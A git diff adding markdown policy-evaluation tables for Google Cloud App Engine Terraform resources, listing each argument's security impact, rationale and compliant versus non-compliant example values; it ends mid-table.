diff --git a/docs/gcp/App_Engine/app_engine_application.md b/docs/gcp/App_Engine/app_engine_application.md new file mode 100644 index 000000000..95b995c96 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_application.md @@ -0,0 +1,23 @@ +## 🛡️ Policy Deployment Engine: `app_engine_application` + +This section provides a concise policy evaluation for the `app_engine_application` resource in GCP. + +Reference: [Terraform Registry – app_engine_application](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_application) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `project` | ~>**NOTE:** GCP only accepts project ID, not project number. If you are using number, you may get a "Permission denied" error. | true | true | To enforce the use of Project IDs over Project Numbers to prevent API resolution failures and (Permission Denied) errors during deployment. | gcp-project-12345 | 123456789 | +| `location_id` | The location to serve the app from. | true | true | To esnure data residency compliance, prevents deployment to unauthorized regions, as App Engine locations cannot be changed once set. | australia-southeast1 | europe-west1 | +| `auth_domain` | The domain to authenticate users with when using App Engine's User API. | false | false | Modern identity management is handled via Identity-Aware Proxy IAP), making the legacy domain setting redundant for security enforcement. | None | None | +| `database_type` | Can be `CLOUD_FIRESTORE` or `CLOUD_DATASTORE_COMPATIBILITY` for new instances. To support old instances, the value `CLOUD_DATASTORE` is accepted by the provider, but will be rejected by the API. To create a Cloud Firestore database without creating an App Engine application, use the [`google_firestore_database`](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/firestore_database) resource instead. | false | true | To enforce the selection of Cloud Firestore so the application uses Google's latest scalable database technology with modern security and consistency features. | CLOUD_FIRESTORE | CLOUD_DATASTORE_COMPATIBILITY | +| `serving_status` | The serving status of the app. | false | true | Ensures applications are deployed in an active state and prevents accidental service outages caused by manual or uncoordinated status overrides. | SERVING | USER_DISABLED | +| `feature_settings` | A block of optional settings to configure specific App Engine features: | false | true | to enforce the use of modern split health checks to ensure precise monitoring of application readiness and liveness, replacing legacy combined health checks. | None | None | +| `split_health_checks` | Set to false to use the legacy health check instead of the readiness and liveness checks. | true | true | Enables the separation of readiness and liveness probes to improve deployment reliability and prevent traffic from being routed to instances that are still initializing. | split_health_checks = true | split_health_checks = false | +| `iap` | Settings for enabling Cloud Identity Aware Proxy | false | true | Enforces Identity-Aware Proxy to establish a Zero Trust security layer, ensuring that only authenticated and authorized users can access the application, regardless of network location. | None | None | +| `oauth2_client_id` | OAuth2 client ID to use for the authentication flow. | true | true | Mandates a valid OAuth2 Client ID to securely link the IAP to the organization's identity provider, ensuring only verified corporate credentials can grant access. | 12345.apps.googleusercontent.com | incorrect-id.apps.googleusercontent.com | +| `oauth2_client_secret` | OAuth2 client secret to use for the authentication flow. The SHA-256 hash of the value is returned in the oauth2ClientSecretSha256 field. | true | true | Ensures the authenticity of the handshake between Google Cloud and the Identity Provider to prevent man-in-the-middle attacks/unauthorized identity spoofing. | GOCSPX-abc123def456_actual_secret | 12345 | +| `ssl_policy` | A list of the SSL policy that will be applied. Each block has a SSL_POLICY_UNSPECIFIED, DEFAULT, and MODERN field. | false | true | To enforce secure managed SSL certificates to ensure all data in transit is encrypted using modern protocols and to prevent service outages caused by manual certificate expiration. | AUTOMATIC | MANUAL | diff --git a/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md b/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md new file mode 100644 index 000000000..1225a4bb5 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_application_url_dispatch_rules.md @@ -0,0 +1,22 @@ +## 🛡️ Policy Deployment Engine: `app_engine_application_url_dispatch_rules` + +This section provides a concise policy evaluation for the `app_engine_application_url_dispatch_rules` resource in GCP. + +Reference: [Terraform Registry – app_engine_application_url_dispatch_rules](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_application_url_dispatch_rules) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `dispatch_rules` | Rules to match an HTTP request and dispatch that request to a service. Structure is [documented below](#nested_dispatch_rules). | true | true | Establishes centralized routing logic to ensure requests are directed to the correct microservices based on URL patterns, preventing leaky traffic/unauthorized cross-service access. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | Unnecessary as it defaults to the provider-level project configuration if it is not provided, ensuring the resource is naturally governed by the existing project-level access controls. | None | None | + +### dispatch_rules Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `domain` | Domain name to match against. The wildcard "*" is supported if specified before a period: "*.". Defaults to matching all domains: "*". | false | true | To enforce strict hostname mapping to ensure traffic is only routed through approved domains, preventing 'Host Header Injection' and ensuring cross-site requests are properly isolated. | hardhat.pythonanywhere.com | invalid-domain.com | +| `path` | Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. | true | true | To define explicit URL patterns to ensure sensitive application paths are strictly mapped to their intended microservices, preventing accidental exposure of internal endpoints | /* | admin/* | +| `service` | Pathname within the host. Must start with a "/". A single "*" can be included at the end of the path. The sum of the lengths of the domain and path may not exceed 100 characters. | true | true | To enforce explicit mapping of URL patterns to specific microservices to ensure architectural isolation and prevent traffic from falling back to a service that may not have the appropriate security context/permissions | default | unauthorized-service | diff --git a/docs/gcp/App_Engine/app_engine_domain_mapping.md b/docs/gcp/App_Engine/app_engine_domain_mapping.md new file mode 100644 index 000000000..2b6c62897 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_domain_mapping.md @@ -0,0 +1,24 @@ +## 🛡️ Policy Deployment Engine: `app_engine_domain_mapping` + +This section provides a concise policy evaluation for the `app_engine_domain_mapping` resource in GCP. + +Reference: [Terraform Registry – app_engine_domain_mapping](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_domain_mapping) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `domain_name` | Relative name of the domain serving the application. Example: example.com. | true | true | To enforce the use of verified domains to prevent unauthorized shadow branding and ensure all application traffic is protected by corporate-standard SSL/TLS configurations | hardhatenterprises.com | unverified-domain.com | +| `ssl_settings` | SSL configuration for this domain. If unconfigured, this domain will not serve with SSL. Structure is [documented below](#nested_ssl_settings). | false | true | Mandates the use of managed SSL settings to guarantee that all custom domain traffic is encrypted via TLS and to eliminate the risk of service downtime caused by expired manual certificates | None | None | +| `override_strategy` | Whether the domain creation should override any existing mappings for this domain. By default, overrides are rejected. Default value is `STRICT`. Possible values are: `STRICT`, `OVERRIDE`. | false | true | to enforce a clear resolution strategy for domain mapping conflicts to prevent accidental hijacking of custom domains from other projects and ensure predictable routing behavior. | STRICT | OVERRIDE | +| `project` | If it is not provided, the provider project is used. | false | false | It is a standard provider-inherited field as the resource is inherently constrained by the project-level permissions and deployment context of the authenticated service account. | None | None | + +### ssl_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `certificate_id` | ID of the AuthorizedCertificate resource configuring SSL for the application. Clearing this field will remove SSL support. By default, a managed certificate is automatically created for every domain mapping. To omit SSL support or to configure SSL manually, specify `SslManagementType.MANUAL` on a `CREATE` or `UPDATE` request. You must be authorized to administer the `AuthorizedCertificate` resource to manually map it to a DomainMapping resource. Example: 12345. | false | false | Mandating/managing specific certificate IDs manually increases operational overhead and introduces the risk of service outages due to manual renewal failures. | None | None | +| `ssl_management_type` | SSL management type for this domain. If `AUTOMATIC`, a managed certificate is automatically provisioned. If `MANUAL`, `certificateId` must be manually specified in order to configure SSL for this domain. Possible values are: `AUTOMATIC`, `MANUAL`. | true | true | Mandates 'AUTOMATIC' SSL management to utilise Google's managed certificate authority, ensuring renewals and the use of modern cryptographic protocols without human intervention. | AUTOMATIC | MANUAL | +| `pending_managed_certificate_id` | (Output) ID of the managed `AuthorizedCertificate` resource currently being provisioned, if applicable. Until the new managed certificate has been successfully provisioned, the previous SSL state will be preserved. Once the provisioning process completes, the `certificateId` field will reflect the new managed certificate and this field will be left empty. To remove SSL support while there is still a pending managed certificate, clear the `certificateId` field with an update request. | false | false | Is a read-only output attribute managed by Google Cloud, represents a transient state during certificate provisioning and cannot be influenced/configured by the user. | None | None | diff --git a/docs/gcp/App_Engine/app_engine_firewall_rule.md b/docs/gcp/App_Engine/app_engine_firewall_rule.md new file mode 100644 index 000000000..a01812135 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_firewall_rule.md @@ -0,0 +1,17 @@ +## 🛡️ Policy Deployment Engine: `app_engine_firewall_rule` + +This section provides a concise policy evaluation for the `app_engine_firewall_rule` resource in GCP. + +Reference: [Terraform Registry – app_engine_firewall_rule](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_firewall_rule) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `source_range` | IP address or range, defined using CIDR notation, of requests that this rule applies to. | true | true | Enforces strict IP CIDR boundaries to minimize the application's attack surface by ensuring only trusted networks or specific geographic IP ranges can interact with the App Engine environment. | 192.168.1.0/24 | * | +| `action` | The action to take if this rule matches. Possible values are: `UNSPECIFIED_ACTION`, `ALLOW`, `DENY`. | true | true | Is the explicit binary outcome for a network request, ensuring that the firewall behaves as a definitive gatekeeper rather than allowing traffic to pass through ambiguity. | ALLOW | DENY | +| `description` | An optional string description of this rule. | false | false | Is an informative field that does not influence the network logic/security enforcement of the firewall rule. | None | None | +| `priority` | A positive integer that defines the order of rule evaluation. Rules with the lowest priority are evaluated first. A default rule at priority Int32.MaxValue matches all IPv4 and IPv6 traffic when no previous rule matches. Only the action of this rule can be modified by the user. | false | true | Enforces an ordering of firewall rules to ensure that specific security 'Allow' or 'Deny' logic is evaluated in the correct sequence. | 1000 | 2147483647 | +| `project` | If it is not provided, the provider project is used. | false | false | Is automatically constrained by the Google provider's project configuration, ensuring that firewall rules are strictly applied to the intended environment without manual entry. | None | None | diff --git a/docs/gcp/App_Engine/app_engine_flexible_app_version.md b/docs/gcp/App_Engine/app_engine_flexible_app_version.md new file mode 100644 index 000000000..0be330958 --- /dev/null +++ b/docs/gcp/App_Engine/app_engine_flexible_app_version.md @@ -0,0 +1,265 @@ +## 🛡️ Policy Deployment Engine: `app_engine_flexible_app_version` + +This section provides a concise policy evaluation for the `app_engine_flexible_app_version` resource in GCP. + +Reference: [Terraform Registry – app_engine_flexible_app_version](https://registry.terraform.io/providers/hashicorp/google/latest/docs/resources/app_engine_flexible_app_version) + +--- + +## Argument Reference + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `runtime` | Desired runtime. Example python27. | true | true | To ensure the application environment is patched against known vulnerabilities and remains compatible with organizational security tooling. | nodejs | python27 | +| `readiness_check` | Configures readiness health checking for instances. Unhealthy instances are not put into the backend traffic rotation. Structure is [documented below](#nested_readiness_check). | true | true | Mandates the configuration of health probes to ensure that the load balancer only routes traffic to fully initialized and healthy instances which prevents errors and ensures correct deployments. | None | None | +| `liveness_check` | Health checking configuration for VM instances. Unhealthy instances are killed and replaced with new instances. Structure is [documented below](#nested_liveness_check). | true | true | Enforces the configuration of liveness probes to detect deadlocked/zombie processes that are running but no longer functional, allowing the platform to automatically restart the instance and restore service health. | None | None | +| `service` | AppEngine service resource. Can contain numbers, letters, and hyphens. | true | true | Enforces explicit service naming to ensure that application components are logically isolated, preventing accidental resource overwrites. | default | unauthorized-app | +| `version_id` | Relative name of the version within the service. For example, `v1`. Version names can contain only lowercase letters, numbers, or hyphens. Reserved names,"default", "latest", and any name with the prefix "ah-". | false | false | to allow CI/CD pipelines to dynamically generate unique identifiers, which is essential for maintaining an immutable audit trail and enabling safe rollbacks. | None | None | +| `inbound_services` | A list of the types of messages that this application is able to receive. Each value may be one of: `INBOUND_SERVICE_MAIL`, `INBOUND_SERVICE_MAIL_BOUNCE`, `INBOUND_SERVICE_XMPP_ERROR`, `INBOUND_SERVICE_XMPP_MESSAGE`, `INBOUND_SERVICE_XMPP_SUBSCRIBE`, `INBOUND_SERVICE_XMPP_PRESENCE`, `INBOUND_SERVICE_CHANNEL_PRESENCE`, `INBOUND_SERVICE_WARMUP`. | false | false | As primarily used to enable legacy App Engine services which are largely deprecated/irrelevant in the Flexible Environment, security for incoming traffic is instead governed by modern network and firewall policies. | None | None | +| `instance_class` | Instance class that is used to run this version. Valid values are AutomaticScaling: F1, F2, F4, F4_1G ManualScaling: B1, B2, B4, B8, B4_1G Defaults to F1 for AutomaticScaling and B1 for ManualScaling. | false | false | It is a legacy parameter exclusive to the App Engine Standard environment. | None | None | +| `network` | Extra network settings Structure is [documented below](#nested_network). | false | false | App Engine Flexible automatically defaults to the 'default' VPC with managed settings and primary network security is better governed at the VPC and Firewall levels rather than through individual resource declarations. | None | None | +| `resources` | Machine resources for a version. Structure is [documented below](#nested_resources). | false | false | The hardware requirements are tied to the specific application's performance profile, imposing constraints would prevent right-sizing and could lead to resource starvation/unnecessary cloud spend. | None | None | +| `runtime_channel` | The channel of the runtime to use. Only available for some runtimes. | false | false | The platform defaults to the stable channel which ensures that applications run on production-ready environment binaries without requiring manual intervention or the risk of using experimental preview features. | None | None | +| `flexible_runtime_settings` | Runtime settings for App Engine flexible environment. Structure is [documented below](#nested_flexible_runtime_settings). | false | false | The settings are highly specific to individual language runtimes and typically govern performance tuning/debugging than compliance boundaries. | None | None | +| `beta_settings` | Metadata settings that are supplied to this version to enable beta runtime features. | false | false | Parameters are intended for temporary experimental features that are not yet part of the stable API. | None | None | +| `serving_status` | Current serving status of this version. Only the versions with a SERVING status create instances and can be billed. Default value is `SERVING`. Possible values are: `SERVING`, `STOPPED`. | false | false | As it governs the operational state of a version which must remain dynamic to allow automated deployments, traffic splitting and manual emergency interventions without triggering policy violations. | None | None | +| `runtime_api_version` | The version of the API in the given runtime environment. Please see the app.yaml reference for valid values at `https://cloud.google.com/appengine/docs/standard//config/appref`\ Substitute `` with `python`, `java`, `php`, `ruby`, `go` or `nodejs`. | false | false | As managed internally by the selected runtime, enforcing a specific API version at the policy level would create unnecessary coupling between infrastructure code and language-specific internals. | None | None | +| `handlers` | An ordered list of URL-matching patterns that should be applied to incoming requests. The first matching URL handles the request and other request handlers are not attempted. Structure is [documented below](#nested_handlers). | false | false | Flexible Environment is container-based where routing and static file handling are managed internally by the application's web server. | None | None | +| `runtime_main_executable_path` | The path or name of the app's main executable. | false | false | Within a containerized Flexible environment the execution logic is better governed by the entrypoint or the container's internal configuration and enforcing a path would break standard deployment conventions for multi-language microservices. | None | None | +| `service_account` | The identity that the deployed version will run as. Admin API will use the App Engine Appspot service account as default if this field is neither provided in app.yaml file nor through CLI flag. | false | false | To allow developers to assign unique least-privileged identities to each microservice | None | None | +| `api_config` | Serving configuration for Google Cloud Endpoints. Structure is [documented below](#nested_api_config). | false | false | Is a legacy configuration for Google Cloud Endpoints Frameworks, this block would not be utilised. | None | None | +| `env_variables` | Environment variables available to the application. As these are not returned in the API request, Terraform will not detect any changes made outside of the Terraform config. | false | false | Intrinsic to the application's runtime logic. | None | None | +| `default_expiration` | Duration that static files should be cached by web proxies and browsers. Only applicable if the corresponding StaticFilesHandler does not specify its own expiration time. | false | false | Cache-control requirements are dictated by the specific nature of the application's static assets. | None | None | +| `nobuild_files_regex` | Files that match this pattern will not be built into this version. Only applicable for Go runtimes. | false | false | File exclusion is more effectively managed via standardized version control ignore files and container-specific exclusion files. | None | None | +| `deployment` | Code and application artifacts that make up this version. Structure is [documented below](#nested_deployment). | false | true | Is enforced to ensure that every application version is derived from a verified immutable source (such as a specific container image or source code hash). | None | None | +| `endpoints_api_service` | Code and application artifacts that make up this version. Structure is [documented below](#nested_endpoints_api_service). | false | false | API management via Cloud Endpoints is a separate service layer with its own lifecycle. | None | None | +| `entrypoint` | The entrypoint for the application. Structure is [documented below](#nested_entrypoint). | false | true | Enforced to ensure that the application starts using a predefined command-string that adheres to organizational standards | None | None | +| `vpc_access_connector` | Enables VPC connectivity for standard apps. Structure is [documented below](#nested_vpc_access_connector). | false | false | To allow for architectural flexibility, while Serverless VPC Access is required for internal-only communication, as not all workloads require connectivity to VPC-hosted resources. | None | None | +| `automatic_scaling` | Automatic scaling is based on request rate, response latencies, and other application metrics. Structure is [documented below](#nested_automatic_scaling). | false | true | Enforced to ensure that every service can respond to traffic fluctuations while maintaining strict guardrails on resource consumption. | None | None | +| `manual_scaling` | A service with manual scaling runs continuously, allowing you to perform complex initialization and rely on the state of its memory over time. Structure is [documented below](#nested_manual_scaling). | false | false | Lacks the ability to adjust to real-time traffic changes, which can lead to unexpected traffic spikes. | None | None | +| `project` | If it is not provided, the provider project is used. | false | false | To automatically inherit the provider-level project ID | None | None | +| `noop_on_destroy` | If set to true, the application version will not be deleted. | false | false | Ensure that the Terraform state remains a truthful representation of the cloud environment. | None | None | +| `delete_service_on_destroy` | If set to true, the service will be deleted if it is the last version. | false | false | To prevent the accidental deletion of an entire service logical grouping when only a specific version is being decommissioned | None | None | +| `volumes` | | false | false | None | None | None | +| `script` | | false | false | None | None | None | +| `static_files` | | false | false | None | None | None | +| `zip` | Zip | false | true | Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage. | None | None | +| `files` | | false | false | None | None | None | +| `container` | | false | false | None | None | None | +| `cloud_build_options` | | false | false | None | None | None | +| `cpu_utilization` | | false | false | None | None | None | +| `request_utilization` | | false | false | None | None | None | +| `disk_utilization` | | false | false | None | None | None | +| `network_utilization` | | false | false | None | None | None | + +### readiness_check Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | The request path. | true | true | to enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page. | / | /invalid-path | +| `host` | Host header to send when performing a HTTP Readiness check. Example: "myapp.appspot.com" | false | false | App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured. | None | None | +| `failure_threshold` | Number of consecutive failed checks required before removing traffic. Default: 2. | false | true | Configures the specific tolerance level for failed health probes to prevent flapping. | failure_threshold = 4 | failure_threshold = 0 | +| `success_threshold` | Number of consecutive successful checks required before receiving traffic. Default: 2. | false | false | Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer. | None | None | +| `check_interval` | Interval between health checks. Default: "5s". | false | false | As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise. | None | None | +| `timeout` | Time before the check is considered failed. Default: "4s" | false | true | Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue. | 4s | 30s | +| `app_start_timeout` | A maximum time limit on application initialization, measured from moment the application successfully replies to a healthcheck until it is ready to serve traffic. Default: "300s" | false | false | Application initialization times vary drastically based on language runtime, dependency loading, and cache warming requirements. | None | None | + +### liveness_check Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `path` | The request path. | true | true | To enforce a specific dedicated health endpoint to ensure the load balancer validates the actual readiness of the application logic rather than just the availability of the web server/static landing page. | / | /invalid-path | +| `host` | Host header to send when performing a HTTP Readiness check. Example: "myapp.appspot.com" | false | false | App Engine routes health checks to the instance's internal IP, defining a host header is unnecessary and can inadvertently bypass internal security controls if misconfigured. | None | None | +| `failure_threshold` | Number of consecutive failed checks required before considering the VM unhealthy. Default: 4. | false | true | Configures the specific tolerance level for failed health probes to prevent flapping. | failure_threshold = 4 | failure_threshold = 0 | +| `success_threshold` | Number of consecutive successful checks required before considering the VM healthy. Default: 2. | false | false | Google Cloud default is sufficiently conservative to prevent flapping and ensures an instance is stable before it is reintroduced to the load balancer. | None | None | +| `check_interval` | Interval between health checks. | false | false | As Google-managed default provides an optimal balance between rapid failure detection and the reduction of unnecessary noise. | None | None | +| `timeout` | Time before the check is considered failed. Default: "4s" | false | true | Enforces a strict upper limit on how long a health probe can wait for a response to ensure that stalled requests are terminated quickly to prevent them from clogging the application's request queue. | 4s | 30s | +| `initial_delay` | The initial delay before starting to execute the checks. Default: "300s" | false | false | Enforcing a universal delay could lead to premature restarts of slow-starting but healthy applications. | None | None | + +### network Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `forwarded_ports` | List of ports, or port pairs, to forward from the virtual machine to the application container. | false | false | None | None | None | +| `instance_ip_mode` | , [Beta](https://terraform.io/docs/providers/google/guides/provider_versions.html)) Prevent instances from receiving an ephemeral external IP address. Possible values are: `EXTERNAL`, `INTERNAL`. | false | false | None | None | None | +| `instance_tag` | Tag to apply to the instance during creation. | false | false | None | None | None | +| `name` | Google Compute Engine network where the virtual machines are created. Specify the short name, not the resource path. | true | false | None | None | None | +| `subnetwork` | Google Cloud Platform sub-network where the virtual machines are created. Specify the short name, not the resource path. If the network that the instance is being created in is a Legacy network, then the IP address is allocated from the IPv4Range. If the network that the instance is being created in is an auto Subnet Mode Network, then only network name should be specified (not the subnetworkName) and the IP address is created from the IPCidrRange of the subnetwork that exists in that zone for that network. If the network that the instance is being created in is a custom Subnet Mode Network, then the subnetworkName must be specified and the IP address is created from the IPCidrRange of the subnetwork. If specified, the subnetwork must exist in the same region as the App Engine flexible environment application. | false | false | None | None | None | +| `session_affinity` | Enable session affinity. | false | false | None | None | None | + +### resources Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `cpu` | Number of CPU cores needed. | false | false | None | None | None | +| `disk_gb` | Disk size (GB) needed. | false | false | None | None | None | +| `memory_gb` | Memory (GB) needed. | false | false | None | None | None | +| `volumes` | List of ports, or port pairs, to forward from the virtual machine to the application container. Structure is [documented below](#nested_resources_volumes). | false | false | None | None | None | + +### flexible_runtime_settings Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `operating_system` | Operating System of the application runtime. | false | false | None | None | None | +| `runtime_version` | The runtime version of an App Engine flexible application. | false | false | None | None | None | + +### handlers Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `url_regex` | URL prefix. Uses regular expression syntax, which means regexp special characters must be escaped, but should not contain groupings. All URLs that begin with this prefix are handled by this handler, using the portion of the URL after the prefix as part of the file path. | false | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `login` | Methods to restrict access to a URL based on login status. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `auth_fail_action` | Actions to take when the user is not logged in. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `redirect_http_response_code` | 30x code to use when performing redirects for the secure field. Possible values are: `REDIRECT_HTTP_RESPONSE_CODE_301`, `REDIRECT_HTTP_RESPONSE_CODE_302`, `REDIRECT_HTTP_RESPONSE_CODE_303`, `REDIRECT_HTTP_RESPONSE_CODE_307`. | false | false | None | None | None | +| `script` | Executes a script to handle the requests that match this URL pattern. Only the auto value is supported for Node.js in the App Engine standard environment, for example "script:" "auto". Structure is [documented below](#nested_handlers_handlers_script). | false | false | None | None | None | +| `static_files` | Files served directly to the user for a given URL, such as images, CSS stylesheets, or JavaScript source files. Static file handlers describe which files in the application directory are static files, and which URLs serve them. Structure is [documented below](#nested_handlers_handlers_static_files). | false | false | None | None | None | + +### api_config Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `auth_fail_action` | Action to take when users access resources that require authentication. Default value is `AUTH_FAIL_ACTION_REDIRECT`. Possible values are: `AUTH_FAIL_ACTION_REDIRECT`, `AUTH_FAIL_ACTION_UNAUTHORIZED`. | false | false | None | None | None | +| `login` | Level of login required to access this resource. Default value is `LOGIN_OPTIONAL`. Possible values are: `LOGIN_OPTIONAL`, `LOGIN_ADMIN`, `LOGIN_REQUIRED`. | false | false | None | None | None | +| `script` | Path to the script from the application root directory. | true | false | None | None | None | +| `security_level` | Security (HTTPS) enforcement for this URL. Possible values are: `SECURE_DEFAULT`, `SECURE_NEVER`, `SECURE_OPTIONAL`, `SECURE_ALWAYS`. | false | false | None | None | None | +| `url` | URL to serve the endpoint at. | false | false | None | None | None | + +### deployment Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `zip` | Zip File Structure is [documented below](#nested_deployment_zip). | false | true | Ensure that source-based deployments utilize versioned objects stored in Google Cloud Storage | None | None | +| `files` | Manifest of the files stored in Google Cloud Storage that are included as part of this version. All files must be readable using the credentials supplied with this call. Structure is [documented below](#nested_deployment_files). | false | false | individual file-level declarations are redundant when deploying via comprehensive archives or Container Images | None | None | +| `container` | The Docker image for the container that runs the version. Structure is [documented below](#nested_deployment_container). | false | false | To prevent configuration overlap, as in workflows where source code is the primary artifact the platform automatically generates the container via Cloud Build. | None | None | +| `cloud_build_options` | Options for the build operations performed as a part of the version deployment. Only applicable when creating a version using source code directly. Structure is [documented below](#nested_deployment_cloud_build_options). | false | false | Build-time configuration is an operational concern distinct from the application's runtime security posture. | None | None | + +### endpoints_api_service Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Endpoints service name which is the name of the "service" resource in the Service Management API. For example "myapi.endpoints.myproject.cloud.goog" | true | false | None | None | None | +| `config_id` | Endpoints service configuration ID as specified by the Service Management API. For example "2016-09-19r1". By default, the rollout strategy for Endpoints is "FIXED". This means that Endpoints starts up with a particular configuration ID. When a new configuration is rolled out, Endpoints must be given the new configuration ID. The configId field is used to give the configuration ID and is required in this case. Endpoints also has a rollout strategy called "MANAGED". When using this, Endpoints fetches the latest configuration and does not need the configuration ID. In this case, configId must be omitted. | false | false | None | None | None | +| `rollout_strategy` | Endpoints rollout strategy. If FIXED, configId must be specified. If MANAGED, configId must be omitted. Default value is `FIXED`. Possible values are: `FIXED`, `MANAGED`. | false | false | None | None | None | +| `disable_trace_sampling` | Enable or disable trace sampling. By default, this is set to false for enabled. | false | false | None | None | None | + +### entrypoint Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `shell` | The format should be a shell command that can be fed to bash -c. | true | true | Enforced to restrict/standardize the scripts executed during the deployment phase | node ./app.js | sudo node ./app.js | + +### vpc_access_connector Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `name` | Full Serverless VPC Access Connector name e.g. /projects/my-project/locations/us-central1/connectors/c1. | true | false | None | None | None | + +### automatic_scaling Block + +| Argument | Description | Required | Security Impact | Rationale | Compliant | Non-Compliant | +|----------|-------------|----------|-----------------|-----------|-----------|---------------| +| `cool_down_period` | The time period that the Autoscaler should wait before it starts collecting information from a new instance. This prevents the autoscaler from collecting information when the instance is initializing, during which the collected usage would not be reliable. Default: 120s | false | false | Prevents the App Engine autoscaler from reacting to sudden traffic spikes as new instances are ignored until the period ends. | None | None | +| `cpu_utilization` | Target scaling by CPU usage. Structure is [documented below](#nested_automatic_scaling_cpu_utilization). | true | true | Enforced to establish a standardized trigger for horizontal scaling, which ensures that the system proactively adds capacity before CPU saturation leads to increased request latency/service instability | target_utilization = 0.5 | target_utilization = 0.9 | +| `max_concurrent_requests` | Number of concurrent requests an automatic scaling instance can accept before the scheduler spawns a new instance. Defaults to a runtime-specific value. | false | false | Can lead to under-utilisation and higher costs by triggering the creation of new instances before the existing ones are actually CPU/memory constrained. | None | None | +| `max_idle_instances` | Maximum number of idle instances that should be maintained for this version. | false | false | Autoscaler manages idle instances automatically by default, also manually capping too low can cause performance degradation during volatile traffic spikes. | None | None | +| `max_total_instances` | Maximum number of instances that should be started to handle requests for this version. Default: 20 | false | false | Avoid denial-of-service scenarios, as the application cannot scale to meet a legitimate traffic surge and resulting in request timeouts/503 errors. | None | None | +| `max_pending_latency` | Maximum amount of time that a request should wait in the pending queue before starting a new instance to handle it. | false | false | Forces requests to sit in a queue for too long before the App Engine autoscaler triggers a new instance. | None | None | +| `min_idle_instances` | Minimum number of idle instances that should be maintained for this version. Only applicable for the default version of a service. | false | false | To ensure the App Engine autoscaler can ingest performance metrics during traffic surges. | None | None | +| `min_total_instances` | Minimum number of running instances that should be maintained for this version. Default: 2 | false | false | To ensure of allowing the environment to fully de-provision resources during periods of zero activity. | None | None | +| `min_pending_latency` | Minimum amount of time a request should wait in the pending queue before starting a new instance to handle it. | false | false | Optimal wait time before scaling is highly dependent on a specific workload | None | None | +| `request_utilization` | Target scaling by request utilization. Structure is [documented below](#nested_automatic_scaling_request_utilization). | false | false | Can be unreliable if request processing times vary whereas relying on CPU utilisation provides a more accurate measure of when an instance is actually working at its limit. | None | None | +| `disk_utilization` | Target scaling by disk usage. Structure is [documented below](#nested_automatic_scaling_disk_utilization). | false | false | 